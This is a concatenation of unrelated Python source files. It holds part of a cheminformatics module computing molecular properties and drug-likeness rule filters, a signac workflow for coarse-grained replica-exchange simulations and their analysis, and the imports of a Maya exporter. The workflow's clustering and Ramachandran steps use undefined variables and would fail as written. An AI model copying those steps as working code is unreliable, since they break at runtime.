:rtype: list
.. _Ertl (2008):
https://jcheminf.biomedcentral.com/articles/10.1186/1758-2946-1-8
"""
pool = Pool(self.n_jobs)
NP = pool.map_async(molproperty.CalculateNPscore, self.mols).get()
pool.close()
pool.join()
return NP
def GetIFG(self):
"""
A function to compute functional groups in organic molecules
--->IFG
Reference:
(1) `<NAME> (2017)`_.
:param mols: molecules
:type mols: Iterable
:return: list of namedtuple, namedtuple('IFG', ['atomIds', 'atoms', 'type'])
:rtype: list
.. _Ertl Peter (2017):
https://jcheminf.biomedcentral.com/articles/10.1186/s13321-017-0225-z
"""
pool = Pool(self.n_jobs)
ifg = pool.map_async(molproperty.GetIFG, self.mols).get()
pool.close()
pool.join()
return ifg
def CalculateMolVolume(self):
"""
Calculation of Van der Waals Volume of molecule
--->MV
Equation:
for single atom: Vw = 4/3*pi*rw^3, the rw is the Van der Waals radius of atom
VvdW = ∑(atom contributions)-5.92NB(Unit in Å^3), NB is the total number of bonds
the Van der Waals radius of atom is derived from wikipedia.
:param mols: molecules
:type mols: Iterable
:return: Van der Waals Volume of molecule
:rtype: list
"""
pool = Pool(self.n_jobs)
mv = pool.map_async(molproperty.CalculateMolVolume, self.mols).get()
pool.close()
pool.join()
return mv
def CalculateMolDensity(self):
"""
Calculation of density of molecule
--->Dense
:param mols: molecules
:type mols: Iterable
:return: density of molecule
:rtype: list
"""
pool = Pool(self.n_jobs)
md = pool.map_async(molproperty.CalculateMolDensity, self.mols).get()
pool.close()
pool.join()
return md
def CalculateMolFCharge(self):
"""
Calculation of formal charge of molecule
--->fChar
:param mols: molecules
:type mols: Iterable
:return: formal charge of molecule
:rtype: list
"""
pool = Pool(self.n_jobs)
fChar = pool.map_async(molproperty.CalculateMolFCharge, self.mols).get()
pool.close()
pool.join()
return fChar
def CalculateNumSinBond(self):
"""
Calculation of single bond number of molecule
--->nSingle
:param mols: molecules
:type mols: Iterable
:return: the number of single bond
:rtype: list
"""
pool = Pool(self.n_jobs)
nSingle = pool.map_async(molproperty.CalculateNumSinBond, self.mols).get()
pool.close()
pool.join()
return nSingle
def CalculateNumDouBond(self):
"""
Calculation of double bond number of molecule
--->nDouble
:param mols: molecules
:type mols: Iterable
:return: the number of double bond
:rtype: list
"""
pool = Pool(self.n_jobs)
nDouble = pool.map_async(molproperty.CalculateNumDouBond, self.mols).get()
pool.close()
pool.join()
return nDouble
def CalculateNumTriBond(self):
"""
Calculation of triple bond number of molecule
---> nTriple
:param mols: molecules
:type mols: Iterable
:return: the number of triple bond
:rtype: list
"""
pool = Pool(self.n_jobs)
nTriple = pool.map_async(molproperty.CalculateNumTriBond, self.mols).get()
pool.close()
pool.join()
return nTriple
def GetProperties(self,
items = ['MW','Vol','Dense','fChar','nBond','nAtom','nHD','nHA','nHB',
'nHet','nStero','nHev','nRot','nRig','nRing',
'logP','logD','pKa','logSw','ab','MR','TPSA','AP','HetRatio',
'Fsp3','MaxRing','QEDmean','QEDmax','QEDnone','SAscore','NPscore',
'nSingle','nDouble','nTriple','nC','nB','nF','nCl','nBr','nI',
'nP','nS','nO','nN'
],
showSMILES = False):
"""
Get all PC - properties in scopy
"""
funcl = {'MW': 'self.CalculateMolWeight()',
'Vol': 'self.CalculateMolVolume()',
'Dense': 'self.CalculateMolDensity()',
'fChar': 'self.CalculateMolFCharge()',
'nBond': 'self.CalculateNumBonds()',
'nAtom': 'self.CalculateNumAtoms()',
'nHet': 'self.CalculateNumHetero()',
'nRot': 'self.CalculateNumRotatableBonds()',
'nRig': 'self.CalculateNumRigidBonds()',
'nRing': 'self.CalculateNumRing()',
'nHev': 'self.CalculateNumHeavyAtom()',
'logP': 'self.CalculateLogP()',
'logD': 'self.CalculateLogD()',
'pKa': 'self.CalculatepKa()',
'ab': 'self.CheckAcid()',
'MR': 'self.CalculateMolMR()',
'nHD': 'self.CalculateNumHDonors()',
'nHA': 'self.CalculateNumHAcceptors()',
'nHB': 'self.CalculateNumHyBond()',
'AP': 'self.CalculateAromaticProportion()',
'logSw': 'self.CalculateLogSw()',
'Fsp3': 'self.CalculateFsp3()',
'TPSA': 'self.CalculateTPSA()',
'MaxRing': 'self.CalculateMaxSizeSystemRing()',
'nStero': 'self.CalculateNumStereocenters()',
'HetRatio': 'self.CalculateHetCarbonRatio()',
'QEDmean': 'self.CalculateQEDmean()',
'QEDmax': 'self.CalculateQEDmax()',
'QEDnone': 'self.CalculateQEDnone()',
'SAscore': 'self.CalculateSAscore()',
'NPscore': 'self.CalculateNPscore()',
'nSingle': 'self.CalculateNumSinBond()',
'nDouble': 'self.CalculateNumDouBond()',
'nTriple': 'self.CalculateNumTriBond()',
'nC': 'self.CalculateNumCarbon()',
'nB': 'self.CalculateNumBoron()',
'nF': 'self.CalculateNumFluorin()',
'nCl': 'self.CalculateNumChlorin()',
'nBr': 'self.CalculateNumBromine()',
'nI': 'self.CalculateNumIodine()',
'nP': 'self.CalculateNumPhosphor()',
'nS': 'self.CalculateNumSulfur()',
'nO': 'self.CalculateNumOxygen()',
'nN': 'self.CalculateNumNitrogen()',}
vals = []
for item in items:
val = eval(funcl[item])
vals.append(val)
if showSMILES:
pool = Pool(self.n_jobs)
smis = pool.map_async(_GetSmi, self.mols).get()
pool.close()
pool.join()
items.insert(0, 'SMILES')
vals.insert(0, smis)
return dict(zip(items, vals))
class PC_rules(object):
"""
Here, we comdat the whole function that analyse PC-drived rules
:param mols: the molecule to be scanned.
:type mols: Iterable object, each element is rdkit.Chem.rdchem.Mol
:param n_jobs: The number of CPUs to use to do the computation, defaults to 1
:type n_jobs: int, optional
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
"""
def __init__(self, mols, n_jobs=1, detail=False, showSMILES=False):
self.mols = mols
self.detail = detail
self.showSMILES = showSMILES
self.n_jobs = n_jobs if n_jobs>=1 else None
def CheckEganRule(self):
"""
Bad or Good oral biovailability rule
Reference:
Egan, <NAME>., <NAME>, and <NAME>.
J Med Chem, 43.21 (2000): 3867-3877.
Rule details:
0 <= TPSA <= 132
-1 <= logP <=6
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: the weight of molecule(contain hydrogen atoms)
:rtype: list
"""
fn = partial(rulesfilter.CheckEganRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckVeberRule(self):
"""
Bad or Good oral biovailability rule
Reference:
Veber, <NAME>., et al.
Journal of medicinal chemistry 45.12 (2002): 2615-2623.
Rule details:
nRot <= 10
TPSA <= 140
nHB <= 12
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckVeberRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckLipinskiRule(self):
"""
Check molecular under Lipinski's rule
Reference:
Lipinski, <NAME>., et al.
Advanced drug delivery reviews 23.1-3 (1997): 3-25.
Rule details:
MW <= 500
logP <= 5
nHD <= 5
nHA <= 10
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckLipinskiRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckBeyondRo5(self):
"""
Check molecular under beyond Ro5
Reference:
Doak, <NAME>., et al.
journal of medicinal chemistry 59.6 (2015): 2312-2327.
Rule details:
MW <= 1000
-2 <= logP <= 10
nHD <= 6
nHA <= 15
PSA <= 250
nRot <= 20
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckBeyondRo5, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckPfizerRule(self):
"""
Check molecular under Rfizer Rule(3/75 Rule)
Reference:
Hughes, <NAME>., et al.
Bioorganic & medicinal chemistry letters 18.17 (2008): 4872-4875.
Rule details:
logp > 3
TPSA < 75
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckPfizerRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckGSKRule(self):
"""
Check molecular under GSK rule(4/400 Rule)
Reference:
<NAME>.
Journal of medicinal chemistry 51.4 (2008): 817-834.
Rule details:
MW <= 400
logP <= 4
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckGSKRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckOralMacrocycles(self):
"""
Check molecular under oral macrocycles rules
Reference:
Giordanetto, Fabrizio, and <NAME>.
Journal of medicinal chemistry 57.2 (2013): 278-295.
Rule details:
MW < 1000
logP < 10
nHD < 5
TPSA < 250
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckOralMacrocycles, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckOpreaRule(self):
"""
Reference:
Oprea, Tudor I.
Journal of computer-aided molecular design 14.3 (2000): 251-264.
Rules details:
nRing >= 3
nRig >= 18
nRot >=6
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckOpreaRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckGhoseRule(self):
"""
Check molecular under Ghose rule
Reference.:
Ghose, <NAME>., <NAME>, and <NAME>.
Journal of combinatorial chemistry 1.1 (1999): 55-68.
Rules details:
-0.4 < logP < 5.6
160 < MW < 480
40 < MR< 130
20 < nAtom < 70
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckGhoseRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckREOS(self):
"""
Check molecular under REOS program
Reference:
Walters, <NAME>, and <NAME>.
Nat Rev Drug Discov, 2.4 (2003): 259.
Rule details:
200 <= MW <= 500
-5 <= logP <= 5
nHD <= 5
nHA <= 10
nRot <= 8
TPSA <= 150
-4 <= fChar <= 4
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckREOS, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckGoldenTriangle(self):
"""
Check molecular under 'Golden Triangle'
Reference:
Johnson, <NAME>., <NAME>, and <NAME>.
Bioorg Med Chem Lett, 19.19 (2009): 5560-5564.
Rule details:
200 <= MW <= 500
-2 <= logD <= 5
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
pass
# fn = partial(rulesfilter.CheckGoldenTriangle, detail=self.detail, showSMILES=self.showSMILES)
# pool = Pool(self.n_jobs)
# res = pool.map_async(fn, self.mols).get()
# pool.close()
# pool.join()
# return res
def CheckXuRule(self):
"""
Check molecular under Xu's rule
Reference:
Rule details:
nhd <= 5
nha <= 10
3 <= rot <= 35
1 <= nring <= 7
10 <= nhev <= 50
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckXuRule, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckSchneiderRule(self):
"""
Check molecular under Schneider rule
Reference:
Schneider, Nadine, et al.
J Chem Inf Model, 48.3 (2008): 613-628.
Rule details:
mw > 230
nhd > 0
nha > 0
nrot > 0
nring > 0
mr > 40
functional groups > 0
molecular volume > 191
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
pass
def CheckRo4(self):
"""
Referenece:
Rule details:
MW <= 400
logP <= 4
nHD <= 4
nHA <= 8
TPSA <= 120
:param mols: molecules
:type mols: Iterable
:param detail: Control returning specific infomation or not, defaults to False
:type detail: bool, optional
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckRo4, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckRo3(self):
"""
Check molecular under Ro3
Ref.:
Congreve, Miles, et al.
Drug discovery today 19.8 (2003): 876-877.
Rule details:
MW <= 300
-3 <= logP <= 3
NHD <= 3
NHA <= 6
PSA <= 60
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckRo3, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckRo2(self):
"""
Check molecular under RO2
Ref.:
Goldberg, <NAME>., et al.
Drug Discovery Today 20.1 (2015): 11-17.
Rule details:
MW <= 200
Logp <= 2
NHD <= 2
NHA <= 4
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckRo2, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckCNS(self):
"""
Check mol under CNS
Reference:
Jeffrey, Phil, and <NAME>.
Neurobiol Dis, 37.1 (2010): 33-37.
Rule details:
135 <= weight <= 582
-0.2 <= logP <= 6.1
nha <= 5
nhd <= 3
3 <= TPSA <= 118
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckCNS, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
def CheckRespiratory(self):
"""
Check mol under Respiratory
Reference:
Ritchie, <NAME>., <NAME>, and <NAME>.
J Chem Inf Model, 49.4 (2009): 1025-1032.
Rule details:
240<=MW<= 520
-2.0<=logP<=4.7
6<=nHB<=12
51<=tPSA<=135
3<=nRot<=8
1<=nRing<=5
:return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise exrta returning each property
:rtype: `list`
"""
fn = partial(rulesfilter.CheckRespiratory, detail=self.detail, showSMILES=self.showSMILES)
pool = Pool(self.n_jobs)
res = pool.map_async(fn, self.mols).get()
pool.close()
pool.join()
return res
if '__main__' == __name__:
smis = [
'C1=CC=CC(C(Br)C)=C1',
'C1=CC2NC(=O)CC3C=2C(C(=O)C2C=CC=CC=23)=C1',
'C1=CC=C2C(=O)C3C=CNC=3C(=O)C2=C1',
'C1=NC(CCN)=CN1',
'C1CCCC(CCO)C1',
'C1=CC=C2N=C(O)C=CC2=C1',
'C(OC)1=C(C)C=C2OC[C@]([H])3OC4C(C)=C(OC)C=CC=4C(=O)[C@@]3([H])C2=C1C',
'C1=C2N=CC=NC2=C2N=CNC2=C1',
'C1=C(O)C=CC(O)=C1',
'CCC1(c2ccccc2)C(=O)NC(=O)NC1=O',
'N1=CN=CN=C1',
'C1=C2C=CC=CC2=CC2C=CC=CC1=2', #NonGenotoxic_Carcinogenicity
'C1=CC=C2C(=O)CC(=O)C2=C1', #Pains
'C1=CC=CC(COCO)=C1', #Potential_Electrophilic
'N1=NC=CN1C=O', #Promiscuity
'CC(=O)OC(=O)C1C=COC1', #Skin_Sensitization
'S',
'CCCCC(=O)[H]', #Biodegradable
'C1=CN=C(C(=O)O)C=C1', #Chelating
'C(OC)1=CC=C2OCC3OC4C=C(OC)C=CC=4C(=O)C3C2=C1',
'C1=C2N=CC=NC2=C2N=CNC2=C1', #Genotoxic_Carcinogenicity_Mutagenicity
'N(CC)(CCCCC)C(=S)N', #Idiosyncratic
]
mols = [Chem.MolFromSmiles(smi) for smi in smis]
pc = PC_rules(mols,n_jobs=4,detail=True)
res = pc.CheckLipinskiRule()
print(len(res))
print(res[:3])
# print(res['MW'])
|
<filename>examples/signac_HPC/project.py
# project.py
import signac
from flow import FlowProject
import os
from simtk import unit
from cg_openmm.cg_model.cgmodel import CGModel
from cg_openmm.parameters.reweight import get_temperature_list
from cg_openmm.simulation.rep_exch import *
from analyze_foldamers.ensembles.cluster import *
from analyze_foldamers.parameters.bond_distributions import *
from analyze_foldamers.parameters.angle_distributions import *
from openmmtools.cache import global_context_cache
from openmmtools.multistate import ReplicaExchangeSampler
import numpy as np
import simtk.openmm as openmm
import pickle
from cg_openmm.thermo.calc import *
replica_exchange_group = FlowProject.make_group(name='replica_exchange')
analysis_group = FlowProject.make_group(name='analysis')
proj_directory = os.getcwd()
@FlowProject.label
def run_replica_exchange_done(job):
output_directory = os.path.join(job.workspace(),"output")
output_data = os.path.join(output_directory, "output.nc")
rep_exch_completed = 0
if os.path.isfile(output_data):
rep_exch_status = ReplicaExchangeSampler.read_status(output_data)
rep_exch_completed = rep_exch_status.is_completed
return rep_exch_completed
@FlowProject.label
def process_replica_exchange_done(job):
return job.isfile("output/state_36.dcd")
@FlowProject.label
def heat_capacity_done(job):
return job.isfile("output/heat_capacity.pdf")
@FlowProject.label
def state_trajectories_created(job):
return job.isfile("output/state_1.dcd")
@FlowProject.label
def clustering_done(job):
return job.isfile("output/native_medoid_min.pdb")
@FlowProject.label
def ramachandran_done(job):
return job.isfile("output/ramachandran.pdb")
@FlowProject.label
def bonded_distributions_done(job):
return job.isfile("output/bonds_all_states.pdf")
@replica_exchange_group
@FlowProject.operation
@FlowProject.post(run_replica_exchange_done)
def signac_run_replica_exchange(job):
# Run replica exchange simulation for current job parameters
# equil_bond_angle = job.sp.theta
# equil_torsion_angle = job.sp.alpha
# Job settings
output_directory = os.path.join(job.workspace(),"output")
if not os.path.exists(output_directory):
os.mkdir(output_directory)
overwrite_files = True # overwrite files.
global_context_cache.platform = openmm.Platform.getPlatformByName("CUDA")
# Replica exchange simulation settings
total_simulation_time = 20.0 * unit.nanosecond
simulation_time_step = 5.0 * unit.femtosecond
total_steps = int(np.floor(total_simulation_time / simulation_time_step))
output_data = os.path.join(output_directory, "output.nc")
number_replicas = 36
min_temp = 200.0 * unit.kelvin
max_temp = 500.0 * unit.kelvin
temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
exchange_frequency = 200 # Number of steps between exchange attempts
collision_frequency = 5/unit.picosecond
include_bond_forces = True
include_bond_angle_forces = True
include_nonbonded_forces = True
include_torsion_forces = True
constrain_bonds = False
mass = 100.0 * unit.amu
# mass and charge are defaults.
bb = {
"particle_type_name": "bb",
"sigma": job.sp.sigma * unit.angstrom,
"epsilon": job.sp.epsilon * unit.kilojoules_per_mole,
"mass": mass
}
sc = {
"particle_type_name": "sc",
"sigma": job.sp.sigma * unit.angstrom,
"epsilon": job.sp.epsilon * unit.kilojoules_per_mole,
"mass": mass
}
# Monomer definition
A = {
"monomer_name": "A",
"particle_sequence": [bb, sc],
"bond_list": [[0, 1]],
"start": 0,
"end": 0,
}
sequence = 24 * [A]
# Bond definitions
bond_lengths = {"default_bond_length": job.sp.equil_bond_length * unit.nanometer}
bond_force_constants = {
"default_bond_force_constant": job.sp.k_bond * unit.kilojoule_per_mole / unit.nanometer / unit.nanometer
}
# Bond angle definitions
bond_angle_force_constants = {
"default_bond_angle_force_constant": job.sp.k_angle * unit.kilojoule_per_mole / unit.radian / unit.radian
}
equil_bond_angles = {
"default_equil_bond_angle": job.sp.equil_bond_angle_bb_bb_sc * unit.degrees,
"bb_bb_bb_equil_bond_angle": job.sp.equil_bond_angle_bb_bb_bb * unit.degrees}
# torsion angle definitions
torsion_force_constants = {
"default_torsion_force_constant": 0.0 * unit.kilojoule_per_mole,
"bb_bb_bb_bb_torsion_force_constant": job.sp.k_torsion * unit.kilojoule_per_mole}
torsion_phase_angles = {
"sc_bb_bb_sc_torsion_phase_angle": 0 * unit.degrees,
"bb_bb_bb_bb_torsion_phase_angle": job.sp.torsion_phase_angle_bb_bb_bb_bb * unit.degrees,
"bb_bb_bb_sc_torsion_phase_angle": 0 * unit.degrees,
}
torsion_periodicities = {
"sc_bb_bb_sc_torsion_periodicity": job.sp.torsion_periodicity,
"bb_bb_bb_bb_torsion_periodicity": job.sp.torsion_periodicity,
"bb_bb_bb_sc_torsion_periodicity": job.sp.torsion_periodicity,
}
# Get initial positions from local file
pdb_path = os.path.join(proj_directory, "24mer_1b1s_initial_structure.pdb")
positions = PDBFile(pdb_path).getPositions()
# Build a coarse grained model
cgmodel = CGModel(
particle_type_list=[bb, sc],
bond_lengths=bond_lengths,
bond_force_constants=bond_force_constants,
bond_angle_force_constants=bond_angle_force_constants,
torsion_force_constants=torsion_force_constants,
equil_bond_angles=equil_bond_angles,
torsion_phase_angles=torsion_phase_angles,
torsion_periodicities=torsion_periodicities,
include_nonbonded_forces=include_nonbonded_forces,
include_bond_forces=include_bond_forces,
include_bond_angle_forces=include_bond_angle_forces,
include_torsion_forces=include_torsion_forces,
constrain_bonds=constrain_bonds,
sequence=sequence,
positions=positions,
monomer_types=[A],
)
# store the cg model so that we can do various analyses.
cgmodel.export(job.fn("stored_cgmodel.pkl"))
if not os.path.exists(output_data) or overwrite_files == True:
run_replica_exchange(
cgmodel.topology,
cgmodel.system,
cgmodel.positions,
friction=collision_frequency,
temperature_list=temperature_list,
simulation_time_step=simulation_time_step,
total_simulation_time=total_simulation_time,
exchange_frequency=exchange_frequency,
output_data=output_data,
)
else:
print("Replica output files exist")
@replica_exchange_group
@FlowProject.operation
@FlowProject.pre(run_replica_exchange_done)
@FlowProject.post(process_replica_exchange_done)
def signac_process_replica_exchange(job):
# Process replica exchange data
analysis_stats = {}
# Job settings
output_directory = os.path.join(job.workspace(),"output")
output_data = os.path.join(output_directory, "output.nc")
cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"),"rb"))
replica_energies, replica_positions, replica_states, production_start, sample_spacing = process_replica_exchange_data(
output_data=output_data,
output_directory=output_directory,
write_data_file=False,
detect_equilibration=True,
)
analysis_stats["production_start"] = production_start
analysis_stats["energy_decorrelation"] = sample_spacing
pickle_out = open(job.fn("analysis_stats.pkl"), "wb")
pickle.dump(analysis_stats, pickle_out)
pickle_out.close()
make_replica_dcd_files(
cgmodel.topology,
replica_positions,
timestep=5*unit.femtosecond,
time_interval=200,
output_dir=output_directory
)
make_state_dcd_files(
cgmodel.topology,
replica_positions,
replica_states,
timestep=5*unit.femtosecond,
time_interval=200,
output_dir=output_directory
)
@analysis_group
@FlowProject.operation
@FlowProject.pre(process_replica_exchange_done)
@FlowProject.post(heat_capacity_done)
def signac_calc_heat_capacity(job):
# Calculate heat capacity curve
# Job settings
output_directory = os.path.join(job.workspace(),"output")
output_data = os.path.join(output_directory, "output.nc")
# Replica exchange simulation settings.
#These must match the simulations that are being analyzed.
number_replicas = 36
min_temp = 200.0 * unit.kelvin
max_temp = 500.0 * unit.kelvin
temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
# Load in trajectory stats:
analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"),"rb"))
# Read the simulation coordinates for individual temperature replicas
C_v, dC_v, new_temperature_list = get_heat_capacity(
temperature_list,
output_data=output_data,
frame_begin=analysis_stats["production_start"],
sample_spacing=analysis_stats["energy_decorrelation"],
num_intermediate_states=1,
plot_file=f"{output_directory}/heat_capacity.pdf",
)
# Save C_v data to data file:
job.data['C_v'] = C_v
job.data['dC_v'] = dC_v
job.data['T_list_C_v'] = new_temperature_list
print(f"T({new_temperature_list[0].unit}) Cv({C_v[0].unit}) dCv({dC_v[0].unit})")
for i, C in enumerate(C_v):
print(f"{new_temperature_list[i]._value:>8.2f}{C_v[i]._value:>10.4f} {dC_v[i]._value:>10.4f}")
@analysis_group
@FlowProject.operation
@FlowProject.pre(process_replica_exchange_done)
@FlowProject.post(clustering_done)
def signac_clustering(job):
# Predict native structure from rmsd clustering:
output_directory = os.path.join(job.workspace(),"output")
# Load in cgmodel:
cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"),"rb"))
# Load in trajectory stats:
analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"),"rb"))
medoid_positions, cluster_sizes, cluster_rmsd, n_noise, silhouette_avg = get_cluster_medoid_positions_DBSCAN(
file_list=dcd_file_list_rep,
cgmodel=cgmodel,
min_samples=50,
eps=0.1,
frame_start=analysis_stats["production_start"],
frame_stride=50,
frame_end=frame_end,
filter=True,
filter_ratio=filter_ratio,
output_dir=output_directory,
)
job.data['cluster_sizes'] = cluster_sizes
job.data['noise_points'] = n_noise
job.data['cluster_rmsd'] = cluster_rmsd
job.data['avg_silhouette'] = silhouette_avg
# Choose the medoid cluster with the smallest rmsd as the native structure.
k_min = np.argmin(cluster_rmsd)
# Minimize energy of native structure
positions, PE_start, PE_end, simulation = minimize_structure(
cgmodel,
medoid_positions[k_min],
output_file=f"{output_directory}/native_medoid_min.pdb",
)
job.data['native_positions'] = medoid_positions[k_min]
job.data['native_positions_min'] = positions
job.data['native_PE'] = PE_start
job.data['native_PE_min'] = PE_end
@analysis_group
@FlowProject.operation
@FlowProject.pre(state_trajectories_created)
@FlowProject.post(ramachandran_done)
def signac_ramachandran(job):
# Make alpha-theta ramachandran plots:
output_directory = os.path.join(job.workspace(),"output")
# Load in trajectory stats:
analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"),"rb"))
# Load in cgmodel:
cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"),"rb"))
traj_file_list = []
number_replicas = 36
for i in range(number_replicas):
traj_file_list.append(f"{output_directory}/state_{rep+1}.dcd")
rama_hist, xedges, yedges = calc_ramachandran(
cgmodel,
traj_file_list,
plotfile=f"{output_directory}/ramachandran.pdf",
frame_start=analysis_stats["production_start"],
)
@analysis_group
@FlowProject.operation
@FlowProject.pre(state_trajectories_created)
@FlowProject.post(bonded_distributions_done)
def signac_bonded_distributions(job):
# Make alpha-theta ramachandran plots:
output_directory = os.path.join(job.workspace(),"output")
# Load in trajectory stats:
analysis_stats = pickle.load(open(job.fn("analysis_stats.pkl"),"rb"))
# Load in cgmodel:
cgmodel = pickle.load(open(job.fn("stored_cgmodel.pkl"),"rb"))
traj_file_list = []
number_replicas = 36
min_temp = 200.0 * unit.kelvin
max_temp = 500.0 * unit.kelvin
temperature_list = get_temperature_list(min_temp, max_temp, number_replicas)
for i in range(number_replicas):
traj_file_list.append(f"{output_directory}/state_{i+1}.dcd")
bond_hist_data = calc_bond_length_distribution(
cgmodel, traj_file_list,
frame_start=analysis_stats["production_start"],
temperature_list=temperature_list,
plotfile=f"{output_directory}/bonds_all_states.pdf")
angle_hist_data = calc_bond_angle_distribution(
cgmodel, traj_file_list,
frame_start=analysis_stats["production_start"],
temperature_list=temperature_list,
plotfile=f"{output_directory}/angles_all_states.pdf")
bond_hist_data = calc_torsion_distribution(
cgmodel, traj_file_list,
frame_start=analysis_stats["production_start"],
temperature_list=temperature_list,
plotfile=f"{output_directory}/torsions_all_states.pdf")
if __name__ == '__main__':
FlowProject().main()
|
import re
import sys
import math
import os.path
from time import time
import maya.OpenMaya as om
import maya.cmds as mc
import maya.OpenMayaAnim as omanim
import maya.OpenMayaMPx as OpenMayaMPx
import pymel.core.datatypes
import pyawd
from pyawd.core import *
from pyawd.anim import *
from pyawd.scene import *
from pyawd.geom import *
from pyawd.material import *
from pyawd.utils.math import *
